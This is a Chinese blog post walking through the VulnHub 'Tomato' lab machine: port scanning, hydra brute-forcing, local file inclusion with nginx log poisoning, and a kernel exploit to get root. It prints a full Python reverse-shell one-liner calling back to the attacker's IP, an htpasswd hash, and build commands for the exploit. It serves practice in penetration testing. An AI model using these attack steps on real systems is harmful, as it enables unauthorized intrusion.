21、Tomato

于 2024-09-20 15:23:58 发布
阅读量1.1k 收藏 10
点赞数 9
分类专栏: vulnhub靶机训练 文章标签: linux web安全 系统安全 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63855540/article/details/142386444
版权

难度 低(个人认为中)

目标 root权限 + 一个flag

使用VMware启动

kali 192.168.152.56 靶机 192.168.152.66

信息收集

端口信息收集

可以看到有个ftp服务,2211实际是ssh协议端口,80、8888是一个web服务

web测试

80端口显示一个tomato

查看源码给了一些提示

先上dirseardh扫一遍

然后用gobuster的中等字典扫了一下也没有结果

8888端口需要密码登录

可能和前面给的一些提示有关

然后使用cewl命令爬取一下这个页面搞了个字典用hydra爆破了一下这个8888端口的服务发现也没有结果,然后又爆破了一下ftp和ssh服务也没有结果

可能是字典不行,换字典继续跑,把kali的自带的seclectlist下面目录字典使用gobuster跑完了都没跑出来任何东西

看wp用dirb的可以跑出一个目录出来

以后打靶场没思路的时候把所有扫描工具全部上一遍。。。

用的这个的字典/usr/share/dirb/wordlists/common.txt。。。

进去可以看到一些源码内容

把能点的全部浏览了除了这三个图片还有两个txt和info.php其他都是空白,没有其他有效的消息了

看着readme这个网站好像是一个wordpress的一个网站机器人插件用来反爬虫的

突破边界

我以为是要根据这个readme中的内容去官网找源码。。。我搞好了半天都没找到突破点

看了wp看info.php的源码。。。

做这种题只想暴打出题人,到底是在打靶场还是打ctf

看到疑似加载本地资源的参数考虑是否存在任意文件读取,php语言考虑文件包含以及搭配利用各种伪协议

通过信息可以看到这个tomato用户存在

然后继续利用这个文件包含,尝试了一些可以命令执行的伪协议没有什么反应,然后看能不能加载远程文件

但是查看信息发现allow_url_include为off,只有下面两个都为on才支持远程文件包含

那么是否可以尝试包含session文件或者日志文件

经过我的尝试确定了日志文件的路径,一些apache和nginx的路径去猜一下

/var/log/nginx/access.log

并且这个日志记录的是8888端口的访问记录,就那个登录的包修改一些UA

可以看到记录也出现了

那么我们写一段php代码进去然后包含这个日志文件看执不执行

可以看到成功的执行了

那么可以直接写反弹shell的命令进行shell的反弹了

但是搞了半天没成功,我不知道是不是里面有什么编码的问题,写多了搞得这个日志都记录不进去了。只能换个日志选择nginx的错误日志,同时在nginx的错误日志中发现了这个8888登录在使用/etc/nginx/.htpasswd文件中的内容进行判断,然后读取这个文件读到了账号密码

ngnix:$apr1$azDw/Iwv$E7rIlqjeiX9Sx9.sMCcAZ0

拿这个密码去CMD5网站解密发现要钱。。算了还是继续文件包含吧

换了个文件成功的包含了

/var/log/nginx/error.log

这个文件会包含所有登录失败的请求路径和host,那么这里修改host

成功的回显了数据

能稳定执行命令后尝试使用各种方式方式反弹shell,最后使用python成功的吧shell反弹了回来

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.152.56",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

拿到shell发现是www的权限

因为是直接使用python的pty反弹的所以已经是比较高级的shell了

提权

然后先上个信息收集的脚本linpeas.sh

一上来就是爆红

小于4.6的内核都可以考虑脏牛提权CVE-2016-5195

尝试脏牛然后发现靶机上面缺少了一些环境。。。这种情况最麻烦了

然后去找其他的利用方式

发现基本上使用c编译成的exp都会受限,应该是在kali上面进行gcc用了靶机没有的东西

strings /lib/x86_64-linux-gnu/libc.so.6 |grep GLIBC_

环境上最高才2.23,只能下载一个带有低版本GLIBC的包然后gcc的使用这个包里的来编译,下载2.1x的包就刚好

wget http://launchpadlibrarian.net/172657656/libc6_2.19-0ubuntu6_amd64.deb

然后使用dpkg -x解压

这里不用脏牛了用上面检测出的第二个

把这个c文件cp到当前目录

gcc 45010.c -o exp -Ldir ./libc6_2.19-0ubuntu6_amd64/lib/x86_64-linux-gnu/libc.so.6

然后上传上去赋予权限成功的提权

拿到flag

这种环境的原因真的好麻烦。另外内核漏洞的一些poc可以在这里找

GitHub - SecWiki/linux-kernel-exploits: linux-kernel-exploits Linux平台提权漏洞集合

dreamer292
关注
专栏目录
Vulnhub篇Tomato
千寻的博客
01-12 674
环境搭建 下载地址: https://www.vulnhub.com/entry/tomato-1,557/ kali 192.168.232.140 tomato: 192.168.232.175 win10 :192.168.232.171 第一部分 信息收集 第一步 扫描,发现主机 nmap -sP 192.168.232.0/24 arp-scan -l 第二步 扫描开放的端口 nmap -A -p- 192.168.232.175 nmap -sS -sV -p- -v 192.168.
MetaSploit安全渗透测试全面总结
爱是与世界平行
09-16 3518
MetaSploit安全渗透测试总结MetaSploit简介专业术语1. Exploit_渗透攻击2. Payload_攻击载荷3. shellcode4. Module_模块5. Listener_监听器Centos7安装metasploit官网下载最新rpm包安装配置postgres数据库创建用户和数据库并授权创建metasploit数据配置信息使配置生效启动控制台MetaSploit教程(渗透测试框架)MetaSploit进行端口扫描查看Metasploit框架提供的端口扫描工具:使用Metasplo
kail-linux 爆破mysql数据库
天道酬勤
11-10 1745
爆破mysql数据库信息
[-] Auxiliary failed: Msf::OptionValidateError The following options fa
热门推荐
lixixi
07-10 1万+
msf > use auxiliary/scanner/smb/smb_version  msf auxiliary(smb_version) > set RHOSTS 192.168.229.133 RHOSTS => 192.168.229.133 msf auxiliary(smb_version) > run [-] Auxiliary failed: Msf::OptionVal
Session:"数据无法验证的错误"
乐百事
10-19 3865
1 Session有效期Session在IE中: 有效的窗品包括 1.Session对象只在建立Session对象的窗口中有效。 2.在建立Session对象的窗口中新开链接的窗口  无效的窗口包括 1.直接启动IE浏览器的窗口 2.不是在建立Session对象的窗口中新开链接的窗口2 解决方式1这种情况是因为会话状态(包括SESSION、VIEWSTATE
Whole Tomato Visual Assist X v10.9.2443.0 支持vs 2022
06-04
visual assist X是一款非常好的Microsoft Visual Studio 2022和Visual Studio .NET插件,支持C/C++,C#,ASP,Visual Basic,Java和HTML等语言,Visual Assist X能自动识别各种关键字、系统函数、成员变量、自动...
VulnHub Tomato
weixin_45682839的博客
10-27 2243
涉及知识:主机存活扫描、端口服务探测、WEB信息搜集、目录搜索、文件包含漏洞,日志写入webshell、linux本地提权
tomato靶机渗透测试
weixin_49340699的博客
07-28 1442
tomato靶机渗透测试环境工具流程总结 环境 靶机192.168.66.128 kali192.168.66.129 工具 netdiscover nmap dirb nc CVE-2017-6074本地提权漏洞利用脚本 流程 主机发现 netdiscover -i eth0 -r 192.168.66.0/24 端口扫描 nmap -sV -p- -T5 192.168.66.128 ftp不存在匿名登录 收集80端口信息 没有收获后用dirb目录爆破 爆破出目录http://192.168.6
VulnHub渗透测试实战靶场 - Tomato
最新发布
m0_74215510的博客
04-27 1382
靶机名称:tomato 靶机难度:中等到困难 虚拟机环境:VMware Workstation 15.x Pro(此靶机推荐使用VMware搭建) 目标:获取root shell,即(root@localhost:~#),然后获取/root下的flag 靶机地址:https://download.vulnhub.com/tomato/Tomato.ova
msfvenom
ss810540895的博客
04-20 3041
在使用最新版msf时 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST 192.168.70.19 LPORT 4444 -f elf > backdoor.elf 报错如下 [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payl...
红日安全靶场3
weixin_48169878的博客
07-13 4343
环境准备 1、所有虚拟机已经自动挂起。且内网网段为192.168.93.0\24,外网网段为dhcp,不需要更改2、修改VMnet2的ip为192.168.93.0网段,没有就创建。因为校园网问题,桥接模式无法上网,为了方便,外网网卡改为net模式,并配置192.168.1.0网段,如下所示:修改kail的ip以及dns扫出来......
MSF手机渗透实验(未成功)(CVE-2019-2215 Binder UA)
qq_33163046的博客
03-03 5185
最近想利用metasploit对手机进行依次渗透实验。通过查看最近三年的安卓漏洞,我对CVE-2019-2215这个漏洞很感兴趣。幸运的是,metasploit里就有这个漏洞的攻击payload,于是我就开始试试了。在环境的准备中,你需要有一个kali环境。5分钟完成 Kali linux安装(基于VirtualBox)_virtualbox安装kali_晓翔仔的博客-CSDN博客倒数第二行就是我的中兴手机当然,你需要检查手机安卓的版本,已经只有该漏洞修复前的版本才有成功利用的理论可。
靶场通关 | Tomato靶机通关秘籍~
鱼溯的博客
10-20 1224
靶场通关 | Tomato靶机通关秘籍~
metasploit扫描mysql端口_Kali linux 2016.2(Rolling)中metasploit的端口扫描
weixin_31869917的博客
02-17 1171
目前常见的端口扫描技术一般有如下几类: TCP Connect、TCP SYN、TCP ACK、TCP FIN。Metasploit中的端口扫描器Metasploit的辅助模块中提供了几款实用的端口扫描器。可以输入search portscan命令找到相关的端口扫描器。如下root@kali:~# msfconsole......msf>search portscanMatching Mo...
永恒之蓝 MS17-010 漏洞复现
weixin_53409153的博客
07-19 1322
永恒之蓝简介 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 SMB协议 SMB(Server Message Block)通信协议是微软(Microsoft)和英
Kali linux 2016.2(Rolling)中metasploit的端口扫描
weixin_30315723的博客
05-17 220
  目前常见的端口扫描技术一般有如下几类: TCP Connect、TCP SYN、TCP ACK、TCP FIN。 Metasploit中的端口扫描器   Metasploit的辅助模块中提供了几款实用的端口扫描器。可以输入search portscan命令找到相关的端口扫描器。如下 root@kali:~# msfconsole ...
wordpress获取登录权限后获取shell的方法
墨痕诉清风的博客
09-03 2323
当获取wordpress登录凭证后,获取shell的方法。运行后目录下会自动生成一个zip文件并启动了msf监听。插件要按wordpress的格式写才会被上传成功。这里做一个php.zip的文件进行上传。利用现有的代码文件进行修改。最终得到的访问路径拼装得到。添加自己的shell代码。如图所示点击插件进行上传。这里要主要右上角的名称。访问即可获取shell。再压缩一次上传又失败了。设置 PASSWORD。设置 USERNAME。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值